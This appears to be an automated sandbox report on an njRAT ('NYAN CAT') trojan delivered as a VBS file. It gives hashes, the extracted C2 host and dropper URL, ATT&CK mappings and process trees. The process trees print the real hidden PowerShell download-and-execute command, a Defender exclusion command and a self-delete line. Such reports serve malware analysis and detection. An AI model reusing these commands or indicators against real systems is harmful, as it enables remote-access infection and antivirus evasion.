njrat | 4df37056407ca0353e2357399ec8f2bd7583b6d10fc5d1d4f6744b9415a1ce2f

General

Target

Transaccion Aprobada.vbs
Size

1KB
MD5

45beeab3735b33386dc605d813ab1712
SHA1

9570171eb0875939b3a9fd51710422036ca968a7
SHA256

4df37056407ca0353e2357399ec8f2bd7583b6d10fc5d1d4f6744b9415a1ce2f
SHA512

3b7077d939301d4708a8d41d27bfe0df8e4d703d07af8882e14b02b65dfde303b13f2a428c2911fe3d1eb086e05199bb791562e490ac28092fbd6f520102335e

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21130&authkey=AEqY-yNYbKJY9pM

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

reald27.duckdns.org:3525

Mutex

d58e514d83d54f2c

Attributes

reg_key
d58e514d83d54f2c
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

9 1528 powershell.exe
11 1528 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Hostdyn.exeHostdyn.exe

pid process

1712 Hostdyn.exe
3980 Hostdyn.exe

flow	pid	process
9	1528	powershell.exe
11	1528	powershell.exe

pid	process
1712	Hostdyn.exe
3980	Hostdyn.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transaccion Aprobada.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transaccion Aprobada.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Hostdyn.exe

description pid process target process

PID 1712 set thread context of 3980 1712 Hostdyn.exe Hostdyn.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

1528 powershell.exe
1528 powershell.exe
1528 powershell.exe
2600 powershell.exe
2600 powershell.exe
2600 powershell.exe

description	pid	process	target process
PID 1712 set thread context of 3980	1712	Hostdyn.exe	Hostdyn.exe

pid	process
1528	powershell.exe
1528	powershell.exe
1528	powershell.exe
2600	powershell.exe
2600	powershell.exe
2600	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exeHostdyn.exe

description	pid	process
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	3980	Hostdyn.exe
Token: 33	3980	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3980	Hostdyn.exe
Token: 33	3980	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3980	Hostdyn.exe
Token: 33	3980	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	3980	Hostdyn.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

WScript.exepowershell.exeHostdyn.exeHostdyn.exe

description	pid	process	target process
PID 3980 wrote to memory of 1528	3980	WScript.exe	powershell.exe
PID 3980 wrote to memory of 1528	3980	WScript.exe	powershell.exe
PID 1528 wrote to memory of 1712	1528	powershell.exe	Hostdyn.exe
PID 1528 wrote to memory of 1712	1528	powershell.exe	Hostdyn.exe
PID 1528 wrote to memory of 1712	1528	powershell.exe	Hostdyn.exe
PID 1712 wrote to memory of 2600	1712	Hostdyn.exe	powershell.exe
PID 1712 wrote to memory of 2600	1712	Hostdyn.exe	powershell.exe
PID 1712 wrote to memory of 2600	1712	Hostdyn.exe	powershell.exe
PID 1712 wrote to memory of 3980	1712	Hostdyn.exe	Hostdyn.exe
PID 1712 wrote to memory of 3980	1712	Hostdyn.exe	Hostdyn.exe
PID 1712 wrote to memory of 3980	1712	Hostdyn.exe	Hostdyn.exe
PID 1712 wrote to memory of 3980	1712	Hostdyn.exe	Hostdyn.exe
PID 1712 wrote to memory of 3980	1712	Hostdyn.exe	Hostdyn.exe
PID 1712 wrote to memory of 3980	1712	Hostdyn.exe	Hostdyn.exe
PID 1712 wrote to memory of 3980	1712	Hostdyn.exe	Hostdyn.exe
PID 1712 wrote to memory of 3980	1712	Hostdyn.exe	Hostdyn.exe
PID 3980 wrote to memory of 3828	3980	Hostdyn.exe	cmd.exe
PID 3980 wrote to memory of 3828	3980	Hostdyn.exe	cmd.exe
PID 3980 wrote to memory of 3828	3980	Hostdyn.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transaccion Aprobada.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21130&authkey=AEqY-yNYbKJY9pM' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
5⤵
PID:3828

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hostdyn.exe.log
MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
26948aa918b2801016be20b1f1441c84

SHA1
e934a972f7347403058c318b4e66bfc343916e23

SHA256
eb0fd316505ce8888a5074d94b8315679a5a646bf7a503f5c089765df5e2cc1f

SHA512
a2ae4de74cddcc461ddba8cd43aae984a2896b55ffa92b2cd9e6405e501c693fe4fe72849480cbf4ee99251bc77bafb263b7caeedf624c77777d048bf4bb34e7

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
memory/1528-115-0x0000000000000000-mapping.dmp

Download
memory/1528-121-0x000001D3C4560000-0x000001D3C4561000-memory.dmp

Filesize
4KB

Download
memory/1528-127-0x000001D3C4710000-0x000001D3C4711000-memory.dmp

Filesize
4KB

Download
memory/1528-132-0x000001D3C2410000-0x000001D3C2412000-memory.dmp

Filesize
8KB

Download
memory/1528-133-0x000001D3C2413000-0x000001D3C2415000-memory.dmp

Filesize
8KB

Download
memory/1528-134-0x000001D3C2416000-0x000001D3C2418000-memory.dmp

Filesize
8KB

Download
memory/1712-158-0x0000000004B90000-0x0000000004B91000-memory.dmp

Filesize
4KB

Download
memory/1712-155-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/1712-160-0x0000000004D40000-0x0000000004D56000-memory.dmp

Filesize
88KB

Download
memory/1712-161-0x0000000006FA0000-0x0000000006FA1000-memory.dmp

Filesize
4KB

Download
memory/1712-162-0x0000000004AF0000-0x0000000004B82000-memory.dmp

Filesize
584KB

Download
memory/1712-163-0x0000000007040000-0x000000000707F000-memory.dmp

Filesize
252KB

Download
memory/1712-164-0x0000000006F70000-0x0000000006F7A000-memory.dmp

Filesize
40KB

Download
memory/1712-151-0x0000000000000000-mapping.dmp

Download
memory/1712-159-0x0000000004B00000-0x0000000004B01000-memory.dmp

Filesize
4KB

Download
memory/1712-157-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/2600-181-0x0000000008390000-0x0000000008391000-memory.dmp

Filesize
4KB

Download
memory/2600-186-0x00000000073F2000-0x00000000073F3000-memory.dmp

Filesize
4KB

Download
memory/2600-176-0x0000000004F40000-0x0000000004F41000-memory.dmp

Filesize
4KB

Download
memory/2600-177-0x0000000007A30000-0x0000000007A31000-memory.dmp

Filesize
4KB

Download
memory/2600-178-0x00000000079B0000-0x00000000079B1000-memory.dmp

Filesize
4KB

Download
memory/2600-179-0x00000000080D0000-0x00000000080D1000-memory.dmp

Filesize
4KB

Download
memory/2600-180-0x0000000008320000-0x0000000008321000-memory.dmp

Filesize
4KB

Download
memory/2600-409-0x0000000009CB0000-0x0000000009CB1000-memory.dmp

Filesize
4KB

Download
memory/2600-165-0x0000000000000000-mapping.dmp

Download
memory/2600-183-0x0000000008760000-0x0000000008761000-memory.dmp

Filesize
4KB

Download
memory/2600-185-0x0000000008780000-0x0000000008781000-memory.dmp

Filesize
4KB

Download
memory/2600-403-0x0000000009CC0000-0x0000000009CC1000-memory.dmp

Filesize
4KB

Download
memory/2600-184-0x00000000073F0000-0x00000000073F1000-memory.dmp

Filesize
4KB

Download
memory/2600-187-0x0000000008A80000-0x0000000008A81000-memory.dmp

Filesize
4KB

Download
memory/2600-195-0x00000000097F0000-0x0000000009823000-memory.dmp

Filesize
204KB

Download
memory/2600-202-0x00000000097D0000-0x00000000097D1000-memory.dmp

Filesize
4KB

Download
memory/2600-207-0x0000000009B70000-0x0000000009B71000-memory.dmp

Filesize
4KB

Download
memory/2600-208-0x0000000009D30000-0x0000000009D31000-memory.dmp

Filesize
4KB

Download
memory/2600-230-0x000000007E720000-0x000000007E721000-memory.dmp

Filesize
4KB

Download
memory/2600-231-0x00000000073F3000-0x00000000073F4000-memory.dmp

Filesize
4KB

Download
memory/3828-428-0x0000000000000000-mapping.dmp

Download
memory/3980-167-0x000000000040677E-mapping.dmp

Download
memory/3980-166-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3980-425-0x0000000005A70000-0x0000000005F6E000-memory.dmp

Filesize
5.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads